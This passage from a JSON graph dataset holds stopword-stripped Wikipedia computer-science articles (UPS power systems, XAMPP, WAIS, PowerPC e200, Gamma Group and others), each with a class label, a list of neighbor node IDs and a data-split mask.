ups life cycle usually far greater purely electronic ups 30 years require periodic downtime mechanical maintenance ball bearing replacement larger systems redundancy system ensures availability processes maintenance battery-based designs require downtime batteries hot-swapped usually case larger units newer rotary units use technologies magnetic bearings air-evacuated enclosures increase standby efficiency reduce maintenance low levels typically high-mass flywheel used conjunction motor-generator system units configured case 3 motor generator synchronous/synchronous induction/synchronous motor side unit case nos 2 3 driven directly ac power source typically inverter bypass 6-step double-conversion motor drive 6-pulse inverter case 1 uses integrated flywheel short-term energy source instead batteries allow time external electrically coupled gensets start brought online case nos 2 3 use batteries free-standing electrically coupled flywheel short-term energy source smaller ups systems come several different forms sizes however two common forms tower rack-mount tower models stand upright ground desk shelf typically used network workstations desktop computer applications rack-mount models mounted standard 19-inch rack enclosures require anywhere 1u 12u rack units typically used server networking applications devices feature user interfaces rotate 90° allowing devices mounted vertically ground horizontally would found rack large business environments reliability great importance single huge ups also single point failure disrupt many systems provide greater reliability multiple smaller ups modules batteries integrated together provide redundant power protection equivalent one large ups n+1 means load supplied n modules installation contain n+1 modules way failure one module impact system operation many computer servers offer option redundant power supplies event one power supply failing one power supplies able power load critical point – power supply must able power entire server redundancy enhanced plugging power supply different circuit i.e different circuit breaker redundant protection extended yet connecting power supply ups provides double protection power supply failure ups failure continued operation assured configuration also referred 1+1 2n redundancy budget allow two identical ups units common practice plug one power supply mains power ups ups system placed outdoors specific features guarantee tolerate weather without effects performance factors temperature humidity rain snow among others considered manufacturer designing outdoor ups system operating temperature ranges outdoor ups systems could around −40 °c +55 °c outdoor ups systems either pole ground pedestal host mounted outdoor environment could mean extreme cold case outdoor ups system include battery heater mat extreme heat case outdoor ups system include fan system air conditioning system solar inverter pv inverter solar converter converts variable direct current dc output photovoltaic pv solar panel utility frequency alternating current ac fed commercial electrical grid used local off-grid electrical network critical bos–component photovoltaic system allowing use ordinary ac-powered equipment solar inverters special functions adapted use photovoltaic arrays including maximum power point tracking anti-islanding protection problem combination double-conversion ups generator voltage distortion created ups input double-conversion ups essentially big rectifier current drawn ups non-sinusoidal cause voltage ac mains generator also become non-sinusoidal voltage distortion cause problems electrical equipment connected power source including ups also cause power lost wiring supplying power ups due spikes current flow level noise measured percentage total harmonic distortion current thd classic ups rectifiers thd level around 25 –30 reduce voltage distortion requires heavier mains wiring generators twice large ups several solutions reduce thd double-conversion ups classic solutions passive filters reduce thd 5 –10 full load reliable big work full load present problems used tandem generators alternative solution active filter use device thd drop 5 full power range newest technology double-conversion ups units rectifier use classic rectifier components thyristors diodes uses high-frequency components instead double-conversion ups insulated-gate bipolar transistor rectifier inductor thd small 2 completely eliminates need oversize generator transformers without additional filters investment cost losses space power management pm requires basic computer-to-ups control methods intended one-to-one signaling single source single target example single ups may connect single computer provide status information ups allow computer control ups similarly usb protocol also intended connect single computer multiple peripheral devices situations useful single large ups able communicate several protected devices traditional serial usb control signal replication device may used example allows one ups connect five computers using serial usb connections however splitting typically one direction ups devices provide status information return control signals may permitted one protected systems ups ethernet increased common use since 1990s control signals commonly sent single ups multiple computers using standard ethernet data communication methods tcp/ip status control information typically encrypted example outside hacker gain control ups command shut distribution ups status control data requires intermediary devices ethernet switches serial multiplexers powered one ups systems order ups alerts reach target systems power outage avoid dependency ethernet infrastructure upss connected directly main control server using gsm/gprs channel also sms gprs data packets sent upss trigger software shut pcs reduce load three main types ups batteries valve regulated lead acid vrla flooded cell vla batteries lithium ion batteries run-time battery-operated ups depends type size batteries rate discharge efficiency inverter total capacity lead–acid battery function rate discharged described peukert law manufacturers supply run-time rating minutes packaged ups systems larger systems data centers require detailed calculation load inverter efficiency battery characteristics ensure required endurance attained lead–acid battery charged discharged initially affects reacting chemicals interface electrodes electrolyte time charge stored chemicals interface often called interface charge spreads diffusion chemicals throughout volume active material battery completely discharged e.g car lights left overnight next given fast charge minutes short charging time develops charge near interface battery voltage may rise close charger voltage charging current decreases significantly hours interface charge spread volume electrode electrolyte leading interface charge low may insufficient start car due interface charge brief ups self-test functions lasting seconds may accurately reflect true runtime capacity ups instead extended recalibration rundown test deeply discharges battery needed deep discharge testing damaging batteries due chemicals discharged battery starting crystallize highly stable molecular shapes re-dissolve battery recharged permanently reducing charge capacity lead acid batteries known sulfation also affects types nickel cadmium batteries lithium batteries therefore commonly recommended rundown tests performed infrequently every six months year multi-kilowatt commercial ups systems large easily accessible battery banks capable isolating testing individual cells within battery string consists either combined-cell battery units 12-v lead acid batteries individual chemical cells wired series isolating single cell installing jumper place allows one battery discharge-tested rest battery string remains charged available provide protection also possible measure electrical characteristics individual cells battery string using intermediate sensor wires installed every cell-to-cell junction monitored individually collectively battery strings may also wired series-parallel example two sets 20 cells situation also necessary monitor current flow parallel strings current may circulate strings balance effects weak cells dead cells high resistance shorted cells example stronger strings discharge weaker strings voltage imbalances equalized must factored individual inter-cell measurements within string battery strings wired series-parallel develop unusual failure modes due interactions multiple parallel strings defective batteries one string adversely affect operation lifespan good new batteries strings issues also apply situations series-parallel strings used ups systems also electric vehicle applications consider series-parallel battery arrangement good cells one becomes shorted dead way prevent subtle series-parallel string interactions using parallel strings using separate charge controllers inverters individual series strings even single string batteries wired series adverse interactions new batteries mixed old batteries older batteries tend reduced storage capacity discharge faster new batteries also charge maximum capacity rapidly new batteries mixed string new old batteries depleted string voltage drop old batteries exhausted new batteries still charge available newer cells may continue discharge rest string due low voltage energy flow may useful may wasted old cells resistance heating cells supposed operate within specific discharge window new cells capacity may cause old cells series string continue discharge beyond safe bottom limit discharge window damaging old cells recharged old cells recharge rapidly leading rapid rise voltage near fully charged state new cells capacity fully recharged charge controller detects high voltage nearly fully charged string reduces current flow new cells capacity charge slowly slowly chemicals may begin crystallize reaching fully charged state reducing new cell capacity several charge/discharge cycles capacity closely matches old cells series string reasons industrial ups management systems recommend periodic replacement entire battery arrays potentially using hundreds expensive batteries due damaging interactions new batteries old batteries within across series parallel strings",
    "neighbors": [
      5000,
      1801,
      11534,
      639,
      9625,
      8233,
      3373,
      7983,
      5941,
      3133,
      1098,
      6096,
      6993,
      3927,
      9319,
      5225,
      6514,
      8819,
      383
    ],
    "mask": "Test"
  },
  {
    "node_id": 3182,
    "label": 8,
    "text": "XAMPP:xampp xampp free open-source cross-platform web server solution stack package developed apache friends consisting mainly apache http server mariadb database interpreters scripts written php perl programming languages since actual web server deployments use components xampp makes transitioning local test server live server possible xampp ease deployment means wamp lamp stack installed quickly simply operating system developer advantage number common add-in applications wordpress joomla also installed similar ease using bitnami term xampp apparent acronym however official acronym expansion specified apache friends website homepage header reads xampp apache mariadb php perl indicating abbreviation recursive acronym term unofficially broken follows mysql replaced mariadb 2015-10-19 beginning xampp versions 5.5.30 5.6.14 effectively altering meaning acronym letters p de facto interchangeable convention used apache friends website indicates first letter p short php latter letter p short perl xampp requires one zip tar 7z exe file downloaded run little configuration various components make web server required windows version xampp requires microsoft visual c++ 2017 redistributable xampp regularly updated latest releases apache mariadb php perl also comes number modules including openssl phpmyadmin mediawiki joomla wordpress self-contained multiple instances xampp exist single computer given instance copied one computer another xampp offered full standard version smaller version obvious characteristic xampp ease wamp webserver stack deployed instantiated later common packaged applications could easily installed provided bitnami officially xampp designers intended use development tool allow website designers programmers test work computers without access internet make easy possible many important security features disabled default xampp ability serve web pages world wide web special tool provided password-protect important parts package xampp also provides support creating manipulating databases mariadb sqlite among others xampp installed possible treat localhost like remote host connecting using ftp client using program like filezilla many advantages installing content management system cms like joomla wordpress also possible connect localhost via ftp html editor",
    "neighbors": [
      10242,
      5380,
      8582,
      412,
      5546,
      7983,
      7364,
      8644,
      8262,
      1353,
      5198,
      1363,
      2901,
      9562,
      735,
      225,
      865,
      8419,
      8683,
      5612,
      7022,
      9714,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 3183,
    "label": 9,
    "text": "Tcllib:tcllib tcllib collection packages available tcl programming language tcllib distributed source code well pre-compiled binary formats tcllib supports variety common operating systems windows bsd unix linux tcllib includes implementations many common data structure algorithms linked list hash map tree graph",
    "neighbors": [
      9575,
      6797,
      5492,
      692,
      2804,
      823,
      3193
    ],
    "mask": "Test"
  },
  {
    "node_id": 3184,
    "label": 9,
    "text": "Michael_Franz:michael franz michael franz american computer scientist best known pioneering work just-in-time compilation optimization artificial software diversity chancellor professor computer science donald bren school information computer sciences university california irvine uci professor electrical engineering computer science courtesy henry samueli school engineering uci director uci secure systems software laboratory fellow acm fellow ieee recipient ieee computer society technical achievement award humboldt prize graduated 27 ph.d.s primary advisor published 130 peer-reviewed articles holds 5 u.s patents also co-founder immunant inc. start-up company specializing software security born raised hamburg germany franz attended christianeum hamburg gordonstoun school elgin scotland eventually graduated christianeum accelerated high school diploma vorgezogenes abitur ahead rest class completing military service germany franz moved switzerland begin studies computer science eth zurich finishing diplom-ingenieur degree 1989 undergraduate years president eth computer science students association declining full fulbright scholarship would funded doctoral studies united states stayed eth began doctoral studies supervision turing award winner niklaus wirth completing doctor technical sciences degree 1994 following two years eth zurich senior research associate lecturer joined university california irvine assistant professor computer science january 1996 promoted associate professor 2001 full professor 2006 since 2007 held second appointment uci school engineering professor electrical engineering computer sciences courtesy 2016 awarded title chancellor professor franz well known pioneering advancing several research ideas quite unconventional proposed seem almost obvious hindsight doctoral dissertation entitled code generation on-the-fly key portable software proposed make software portable among different target computer architectures way using on-the-fly compilation compressed intermediate data structure load time two years later java programming language system launched took idea mainstream albeit using term just-in-time compilation instead term on-the-fly compilation franz used franz also one first academics realize javascript going huge time academic community ignoring javascript similar dynamic languages little scripting languages franz student andreas gal researched one would best tackle specific features dynamically typed language just-in-time compiler resulting technique trace tree compilation covered u.s. patent franz took idea brendan eich inventor javascript mozilla cto time collaborative project uci mozilla born eventually culminated tracemonkey javascript engine firefox recently franz one main drivers moving target defense movement cyber security pioneering compiler-generated software diversity defense mechanism software attacks inspired biodiversity nature imagine app store containing diversification engine multicompiler automatically generates unique version every program every user different versions program behave exactly way perspective end-user implement functionality subtly different ways result specific attack succeed small fraction targets attacker would require large number different attacks would way knowing priori specific attack succeed specific target equally importantly approach makes much difficult attacker generate attack vectors way reverse engineering security patches project attracted attention beyond academia coverage popular press ranging far economist wired magazine franz students hold u.s. patent underlying ideas",
    "neighbors": [
      7775,
      6791
    ],
    "mask": "None"
  },
  {
    "node_id": 3185,
    "label": 3,
    "text": "PowerPC_e200:powerpc e200 powerpc e200 family 32-bit power isa microprocessor cores developed freescale primary use automotive industrial control systems cores designed form cpu part system-on-a-chip soc designs speed ranging 600 mhz thus making ideal embedded applications e200 core developed mpc5xx family processors turn derived mpc8xx core powerquicc soc processors e200 adheres power isa v.2.03 well previous book e specification e200 core based microprocessors named mpc55xx mpc56xx/jpc56x scheme confused mpc52xx processors based powerpc e300 core april 2007 freescale ipextreme opened e200 cores licensing manufacturers continental ag freescale developing space tri-core e200 based processor designed electronic brake systems cars stmicroelectronics freescale jointly developed microcontrollers automotive applications based e200 mpc56xx/spc56x family e200 family consists six cores simple low-end complex high-end nature simplest core e200z0 features order four stage pipeline mmu cache fpu uses variable bit length vle part power isa uses 16-bit versions otherwise standard 32-bit powerpc book e isa thus reducing code footprint 30 single 32-bit amba 2.0v6 bus interface load/store unit pipelined 1-cycle load latency supports throughput one load store operation per cycle e200z0 used mpc5510 optional co-processor alongside e200z1 core making chip multicore processor e200z0 available co-processors e200 based processors well low end stand alone processors e200z1 four-stage single-issue pipeline branch prediction unit 8 entry mmu cache fpu use complete 32-bit powerpc isa well vle instructions uses dual 32-bit amba 2.0v6 bus interface load/store unit pipelined 1-cycle load latency supports throughput one load store operation per cycle e200z3 four-stage single-issue pipeline branch prediction unit 16 entry mmu simd capable fpu cache use complete 32-bit powerpc isa well vle instructions uses dual 64-bit amba 2.0v6 bus interface load/store unit pipelined 1-cycle load latency supports throughput one load store operation per cycle e200z4 five-stage dual-issue pipeline branch prediction unit 16 entry mmu signal processing extension spe simd capable single precision fpu 4 kilobyte 2/4-way set associative instruction l1 cache pseudo round-robin replacement algorithm data cache use complete 32-bit powerpc isa well vle instructions uses dual 64-bit bus amba 2.0v6 interface load/store unit pipelined 2-cycle load latency supports throughput one load store operation per cycle depending derivative may support spe lsp e200z6 seven-stage single-issue pipeline branch prediction unit 32 entry mmu signal processing extensions spe simd capable single-precision fpu 8-way set associative 32 kib unified data/instruction l1 cache use complete 32-bit powerpc isa well vle instructions uses single 64-bit bus amba 2.0v6 interface load/store unit pipelined 3-cycle load latency supports throughput one load store operation per cycle e200z7 ten-stage dual-issue pipeline branch prediction unit 32 entry mmu simd capable single-precision fpu 16-kb 4 way set-associative harvard instruction data l1 caches use complete 32-bit powerpc isa well vle instructions uses 32-bit bus amba 2.0v6 interface address bus 64-bit data bus plus attributes control bus load/store unit pipelined 3-cycle load latency supports throughput one load store operation per cycle depending derivative may support spe spe v1.1 spe v2",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      1548,
      1933,
      6926,
      6415,
      3472,
      4881,
      7305,
      11405,
      7302,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      9391,
      10543,
      4017,
      5297,
      10675,
      11314,
      1461,
      11447,
      8120,
      8761,
      6715,
      9020,
      1725,
      1983,
      6207,
      1985,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      9964,
      10734,
      8048,
      10224,
      4211,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3186,
    "label": 9,
    "text": "Static_build:static build static build compiled version program statically linked libraries computer science linking means taking one objects generated compilers assembling single executable program objects program modules containing machine code symbol definitions come two varieties linker program resolves references undefined symbols finding object defines symbol question replacing placeholders symbol address linkers take objects collection called library final program include whole library objects needed libraries diverse purposes exist one system libraries usually linked default modern operating system environments allow dynamic linking postponing resolving undefined symbols program run means executable still contains undefined symbols plus list objects libraries provide definitions loading program load objects/libraries well perform final linking dynamic linking offers three advantages statically built program dynamic linking occurs bindings done compile time static builds predictable behavior rely particular version libraries available final system commonly found forensic security tools avoid possible contamination malfunction due broken libraries examined machine flexibility permits upgraded library benefit dynamically-linked applications also prevent applications assume presence specific version particular library running correctly every application system must copy dynamic library ensure correct operation benefits dynamic linking moot another benefit static builds portability final executable file compiled longer necessary keep library files program references since relevant parts copied executable file result installing statically-built program computer user n't download install additional libraries program ready run",
    "neighbors": [
      1952,
      8037,
      6664,
      7849,
      10013,
      7983,
      2804,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 3187,
    "label": 8,
    "text": "Dynamic_site_acceleration:dynamic site acceleration dynamic site acceleration dsa group technologies make delivery dynamic websites efficient manufacturers application delivery controllers content delivery networks cdns use host techniques accelerate dynamic sites including edge device either adc cdn capable tcp multiplexing placed web servers clients offload origin servers accelerate content delivery usually connection client server requires dedicated process lives origin duration connection clients slow connection occupies part origin server process stay alive server waiting complete request tcp multiplexing situation different device obtains complete valid request client sending origin request fully arrived offloads application database servers slower expensive use compared adcs cdns http built-in system cache control using headers etag expires last modified many cdns adcs claim dsa replaced system calling dynamic caching dynamic cache control gives options invalidate bypass cache standard http cache control purpose dynamic cache control increase cache-hit ratio website rate requests served cache served normal server due dynamic nature web 2.0 websites difficult use static web caching reason dynamic sites per definition personalized content different users regions example mobile users may see different content desktop users may see registered users may need see different content anonymous users see even among registered users content may vary widely often example social media websites static caching dynamic user-specific pages introduces potential risk serving irrelevant content 3rd party content wrong users identifier allowing caching system differentiate content url/get-request n't correctly varied appending user-specific tokens/keys dynamic cache control options configure caching cookie-based cache control allows serving content cache based presence lack specific cookies cookie stores unique identifier-key logged-in user device already implemented authenticating users upon execution page opens session dynamic caching system caches referred url well cookie keys allowing simply enable serving default caches anonymous users personalized caches logged-in users without forcing modify code make append additional user identifiers url like static caching system personalized content cached might queued edge device means system store list possible responses might needed future allowing readily served differs caching prefetched responses served especially useful accelerating responses third-party apis advertisements route optimization also known latency-based routing optimizes route traffic clients different origin servers order minimize latency route optimization done dns provider cdn route optimization comes measuring multiple paths client origin server recording fastest path path used serve content client specific geographical zone makes request although front-end optimization feo dsa describe group techniques improve online content delivery work different aspects overlaps on-the-fly data compression improved cache-control however key differences",
    "neighbors": [
      10368,
      65,
      9601,
      4797,
      2994,
      11250,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 3188,
    "label": 1,
    "text": "MySQL_Archive:mysql archive mysql archive storage engine mysql relational database management system users use analytic storage engine create table “ archive ” data deleted table added archive engine uses compression strategy based zlib library packs rows using bit header represent nulls removes whitespace character type fields completed row inserted compression buffer flushed disk explicit flush table read closing table one current restrictions archive tables support indexes thus necessitating table scan select tasks archive tables however supported mysql query cache dramatically reduce response times archive table queries repetitively issued mysql examining index support archive tables upcoming releases engine acid compliant unlike oltp engines uses stream format disk block boundaries head archive file generated byte array representing data format contents file mysql 5.1 copy mysql frm file stored header archive file frm file represents definition table allows archive file restored mysql server archive file copied server despite use zlib archive files compatible gzio basis gzip tools uses azio system fork gzio archive differs mysql analytical engine myisam row level locking engine keeping constant version snapshot throughout single query making mvcc means archive lock concurrent bulk inserts bulk inserts performs interlaced insert unlike myisam order guaranteed users use archive_reader tool take online snapshot table change characteristics archive file create archive table specify following engine string mysql archive storage engine authored maintained brian aker introduced 2004 mysql 4.1",
    "neighbors": [
      11392,
      8195,
      10258,
      7453,
      1950,
      9503,
      7339,
      7983,
      9010,
      10048,
      6721,
      7234,
      5964,
      5198,
      4561,
      7506,
      9687,
      10459,
      6245,
      8295,
      8683,
      5356,
      2413,
      5612,
      7022,
      4598,
      1399,
      10873,
      2810,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3189,
    "label": 2,
    "text": "Jeff_Waugh:jeff waugh jeff waugh also known jdub australian free software open source software engineer known past prominence gnome ubuntu projects communities 2004 waugh hired mark shuttleworth early employee canonical ltd. member ubuntu project worked business development oscon 2005 waugh best evangelist google-o'reilly open source awards evangelism ubuntu gnome announced resignation canonical july 2006 focus fully work gnome project 2007 waugh then-wife pia waugh co-directors waugh partners australian open source consultancy launched 2006 waugh partners 2007 nsw state pearcey award young achievers work promoting free software australian ict industry 2008 waugh partner one laptop per child australia program 2008 pia waugh moved new career waugh later employers included bulletproof networks kounta waugh served number formal semi-formal positions free software development community projects waugh author python feed aggregator planet waugh married fellow open-source advocate community leader pia waugh 2011 wrote blog september 2011 occasion ruok day struggling depression since late teens contributing factor divorce felt overcome category living people category open source people category free software programmers category year birth missing living people category australian computer specialists category gnome developers category ubuntu operating system people category people sydney category australian bloggers",
    "neighbors": [
      1026,
      5644,
      10255,
      2581,
      6691,
      6694,
      2109,
      3654,
      8263,
      10822,
      589,
      4177,
      1107,
      8787,
      4192,
      7793,
      5755,
      11394,
      8848,
      657,
      6808,
      6302,
      8354,
      8364,
      3245,
      9908,
      1717,
      708,
      6352,
      3802,
      4831,
      7913,
      9971,
      5369,
      6413,
      4367,
      3859,
      7450,
      1822,
      802,
      5410,
      6947,
      5931,
      6445,
      823,
      11069,
      843,
      11602,
      4437,
      4951,
      6489,
      5990,
      8554,
      4459,
      7020,
      1394,
      2930,
      1396,
      11643,
      2955,
      10642,
      1939,
      11669,
      3478,
      926,
      7584,
      930,
      8621,
      8112,
      439,
      10687,
      3015,
      975,
      3550,
      9696,
      11232,
      8177,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 3190,
    "label": 7,
    "text": "Turbot_(business):turbot business turbot turbot hq inc privately held software company headquartered united states turbot provides automated cloud governance controls enterprise cloud applications infrastructure turbot founded nathan wallace 2014 us corporation based nj 2016 company expanded virtual office across varying us states 2017 turbot announced expansion united kingdom turbot hq limited india turbot hq india private limited 2018 turbot expanded footprint multiple cities india started operations australia turbot hq private limited turbot provides real-time automated configuration control software-defined infrastructure cloud platforms turbot aws advanced technology partner multiple certified competencies security cloud management life sciences etc turbot also microsoft azure partner google cloud platform partner well member cloud native computing foundation linux foundation center internet security turbot varying consulting managed services technology integration partnerships providing varying use cases partners empower services capabilities turbot uses “ sandbox ” approach governance allows internal departments freedom explore adopt new software solutions adhering data protection regulations",
    "neighbors": [
      7248,
      4011,
      997
    ],
    "mask": "None"
  },
  {
    "node_id": 3191,
    "label": 5,
    "text": "Wide_area_information_server:wide area information server wide area information server wais client–server text searching system uses ansi standard z39.50 information retrieval service definition protocol specifications library applications z39.50:1988 search index databases remote computers developed late 1980s project thinking machines apple computer dow jones kpmg peat marwick wais adhere either standard osi framework adopting instead tcp/ip created unique protocol inspired z39.50:1988 wais protocol servers promoted thinking machines corporation tmc cambridge massachusetts tmc-produced wais servers ran massively parallel cm-2 connection machine sparc-based cm-5 mp supercomputers wais clients developed various operating systems windowing systems including microsoft windows macintosh next x gnu emacs character terminals tmc released free open source software version wais unix 1991 inspired wais project full-text databases emerging sgml projects z39.50 version 2 z39.50:1992 released unlike 1988 predecessor compatible superset international iso 10162/10163 standard advent z39.50:1992 termination support free wais thinking machines establishment wais inc commercial venture u.s. national science foundation funded clearinghouse networked information discovery retrieval cnidr promote internet search discovery systems open source standards cnidr created new free open-source wais first freewais based wais-8-b5 codebase tmc wholly new software suite isite based upon z39.50:1992 using isearch full-text search engine ulrich pfeifer norbert gövert computer science department university dortmund extended cnidr freewais code become freewais-sf structured fields main improvement ulrich pfeifer rewrote freewais-sf perl becoming wait inspired wais directory servers eliot christian usgs envisioned gils government information locator service gils based upon z39.50:1992 extensions became u.s. federal mandate part paperwork reduction act 1995 thinking machines corp provided service called directory servers wais server like information source except containing information wais servers internet wais server tmc wais code creates special record containing metadata plus common words describing indexed content record uploaded central server indexed along records public servers directory searched find servers might content relevant specific field interest model searching wais servers search became model gils peter deutsch whois++ distributed white pages directory two developers wais brewster kahle harry morris left thinking machines found wais inc menlo park california bruce gilliat wais inc. originally joint project apple computer peat markwick dow jones thinking machines 1992 presidential campaign ross perot used wais product campaign wide information system connecting field offices national office later perot systems adopted wais better access information corporate databases early clients environmental protection agency library congress department energy later wall street journal encyclopædia britannica wais inc sold aol may 1995 15 million following sale margaret st. pierre left wais inc start blue angel technologies wais variant formed basis metastar georgios papadopoulos left found atypon françois schiettecatte left human genome project johns hopkins hospital started fs-consult developed variant wais eventually became scienceserver later sold elsevier science kahle gilliat went found internet archive alexa internet public wais often used full-text search engine individual internet gopher servers supplementing popular veronica system searches menu titles gopher sites wais gopher share world wide web client–server architecture certain amount functionality wais protocol influenced largely z39.50 protocol designed networking library catalogs allows text-based search retrieval following search gopher provides free text search mechanism principally uses menus menu list titles user may pick one gopher space web containing many loops menu system gives user impression tree web data model similar gopher model except menus generalized hypertext documents cases simple file servers generate menus hypertext directly file structure server web hypertext model permits author freedom communicate options available reader include headings various forms list structure",
    "neighbors": [
      6657,
      10242,
      5251,
      8582,
      7943,
      3979,
      140,
      6797,
      2318,
      3218,
      9757,
      10269,
      10910,
      35,
      3110,
      10791,
      6319,
      7983,
      9905,
      9908,
      4661,
      10808,
      6330,
      4797,
      5054,
      8639,
      10174,
      7364,
      1480,
      10057,
      10313,
      10060,
      9043,
      2901,
      4310,
      119,
      5078,
      6229,
      6231,
      735,
      10722,
      10727,
      488,
      11112,
      5482,
      9834,
      494,
      8046,
      1520,
      113,
      8443,
      9843,
      5492,
      6133,
      1399,
      8440,
      3961,
      5114,
      6651,
      636,
      637,
      7806
    ],
    "mask": "Train"
  },
  {
    "node_id": 3192,
    "label": 4,
    "text": "Gamma_Group:gamma group gamma group anglo-german technology company sells surveillance software governments police forces around world company strongly criticised human rights organisations selling finfisher software undemocratic regimes egypt bahrain following arab spring protests 2011 activists bahrain identified suspicious emails identified social engineering attempts persuade launch applications containing malicious software emails passed analysts identified malware would give finfisher access infected computers university toronto citizenlab conducted investigation gamma identified 33 likely government users finfisher 32 countries based presence finfisher master ip address country belonging specific government department 2014 gamma group hacked 40 gb dump information released detailing gamma 'client lists price lists source code details effectiveness finfisher malware user support documentation list classes/tutorials much details gamma capabilities found surveillance industry index despite hack extent negative publicity gamma activities finfisher reported gaining popularity around world numerous governments",
    "neighbors": [
      8537,
      1169,
      4314,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 3193,
    "label": 9,
    "text": "Incr_Tcl:incr tcl incr tcl commonly stylised nowiki incr tcl /nowiki often abbreviated itcl set object-oriented extensions tcl programming language widely used among tcl community generally regarded industrial strength name pun c++ itcl implementations exist package may dynamically loaded tcl application well independent standalone language interpreter itcl allows namespaces used organizing commands variables example itcl like tcl built-in support integration c code itcl classes itcl follows copyright restrictions tcl/tk use copy modify even redistribute software without written agreement royalty provided keep copyright notices intact claim ownership software authors institutions retain ownership described license.terms files included standard distribution information please see incrtcl.sourceforge.net/itcl/copyright.html incr tcl ground chad smith published january 2000",
    "neighbors": [
      9345,
      8262,
      9575,
      6826,
      3183,
      692
    ],
    "mask": "None"
  },
  {
    "node_id": 3194,
    "label": 3,
    "text": "MP6:mp6 rise mp6 superpipelined superscalar microprocessor designed rise technology compete intel pentium line rise technology spent 5 years developing x86 compatible microprocessor finally introduced november 1998 low-cost low-power alternative super socket 7 platform allowed higher front-side bus speeds previous socket 7 made possible cpu manufacturers keep competing intel moved slot 1 platform mp6 made use mmx instruction set three mmx pipelines allowed cpu execute three mmx instructions single cycle three integer units made possible execute three integer instructions single cycle well fully pipelined floating point unit could execute two floating-point instructions per cycle improve performance core utilized branch prediction number techniques resolve data dependency conflicts according rise mp6 perform almost fast intel pentium ii frequencies despite innovative features real-life performance mp6 proved disappointing mainly due small l1 cache another reason rise mp6 pr 266 rating based upon old intel pentium mmx main competitors intel celeron 266 idt winchip 2-266 amd k6-2 266 delivered performance benchmarks applications celeron k6-2 actually worked 266 mhz winchip 2 pr rating based upon performance amd opponent announced 1998 chip never achieved widespread use rise quietly exited market december following year like competitors cyrix idt rise found unable compete intel amd silicon integrated systems sis licensed mp6 technology used sis 550 system-on-a-chip soc integrated mp6 cpu north south bridges sound video single chip sis 550 saw use compact pcs consumer devices dvd players sis 551 chip also marketed dm p vortex86 m6127d later dm p took mp6 design sis continues development vortex86 soc product line dm p signed agreement xcore allow rebrand chip xcore86",
    "neighbors": [
      5088,
      3588,
      5380,
      6020,
      8231,
      10440,
      1260,
      1677,
      398,
      10734,
      1776,
      499,
      8851,
      3798,
      4252,
      8125,
      6815
    ],
    "mask": "Test"
  },
  {
    "node_id": 3195,
    "label": 1,
    "text": "VxInsight:vxinsight vxinsight knowledge mining tool developed sandia national laboratories institute scientific information allows user visualize relationship groups objects large databases 3d landscape hillier et al call pioneering study vxinsight used analyze gene expression i.e microarray data across number conditions c. elegans using vxinsight kim et al able cluster genes mounts coherent functions also able make novel observations finding distinct classes transposons tc3 mariner transposons appear differentially regulated development",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 3196,
    "label": 1,
    "text": "In-database_processing:in-database processing in-database processing sometimes referred in-database analytics refers integration data analytics data warehousing functionality today many large databases used credit card fraud detection investment bank risk management use technology provides significant performance improvements traditional methods traditional approaches data analysis require data moved database separate analytics environment processing back database spss ibm examples tools still today analysis database data resides eliminates costs time security issues associated old approach processing data warehouse though in-database capabilities first commercially offered mid-1990s object-related database systems vendors including ibm illustra/informix ibm oracle technology begin catch mid-2000s concept migrating analytics analytical workstation enterprise data warehouse first introduced thomas tileston presentation entitled “ cake eat accelerate data mining combining sas teradata ” teradata partners 2005 experience possibilities conference orlando fl september 18–22 2005 mr. tileston later presented technique globally 2006 2007 2008 point need in-database processing become pressing amount data available collect analyze continues grow exponentially due largely rise internet megabytes gigabytes terabytes petabytes “ big data ” one primary reasons become important collect process analyze data efficiently accurately also speed business accelerated point performance gain nanoseconds make difference industries additionally people industries use data answer important questions questions ask become complex demanding sophisticated tools precise results factors combination created need in-database processing introduction column-oriented database specifically designed analytics data warehousing reporting helped make technology possible three main types in-database processing translating model sql code loading c c++ libraries database process space built-in user-defined function udf out-of-process libraries typically written c c++ java registering database built-in udfs sql statement type in-database processing predictive model converted source language sql run database usually stored procedure many analytic model-building tools ability export models either sql pmml predictive modeling markup language sql loaded stored procedure values passed parameters model executed natively database tools use approach include sas spss r kxen c c++ udf libraries run process functions typically registered built-in functions within database server called like built-in function sql statement running process allows function full access database server ’ memory parallelism processing management capabilities functions must well-behaved negatively impact database engine type udf gives highest performance method olap mathematical statistical univariate distributions data mining algorithms out-of-process udfs typically written c c++ java running process run risk database engine run process space resources ’ expected performance in-process udf still typically registered database engine called standard sql usually stored procedure out-of-process udfs safe way extend capabilities database server ideal way add custom data mining libraries in-database processing makes data analysis accessible relevant high-throughput real-time applications including fraud detection credit scoring risk management transaction processing pricing margin analysis usage-based micro-segmenting behavioral ad targeting recommendation engines used customer service organizations determine next-best actions in-database processing performed promoted feature many major data warehousing vendors including teradata aster data systems acquired ibm netezza puredata systems db2 warehouse products iemc greenplum sybase paraccel sas exasol products offered vendors cwi monetdb ibm db2 warehouse offer users means write functions udfs extensions udxs enhance products capabilities fuzzy logix offers libraries in-database models used mathematical statistical data mining simulation classification modelling well financial models equity fixed income interest rate portfolio optimization in-database pioneers collaborates marketing teams institutionalize data mining analytic processes inside data warehouse fast reliable customizable consumer-behavior predictive analytics in-database processing one several technologies focused improving data warehousing performance others include parallel computing shared everything architectures shared nothing architectures massive parallel processing important step towards improving predictive analytics capabilities",
    "neighbors": [
      2688,
      5632,
      9345,
      4483,
      10632,
      8201,
      4107,
      8979,
      2068,
      4116,
      7446,
      10389,
      2456,
      1049,
      5658,
      5403,
      9631,
      1697,
      9634,
      9893,
      4263,
      2344,
      7080,
      10286,
      6395,
      9397,
      9147,
      3004,
      7868,
      11324,
      10048,
      5953,
      6850,
      11457,
      6085,
      9286,
      3529,
      5450,
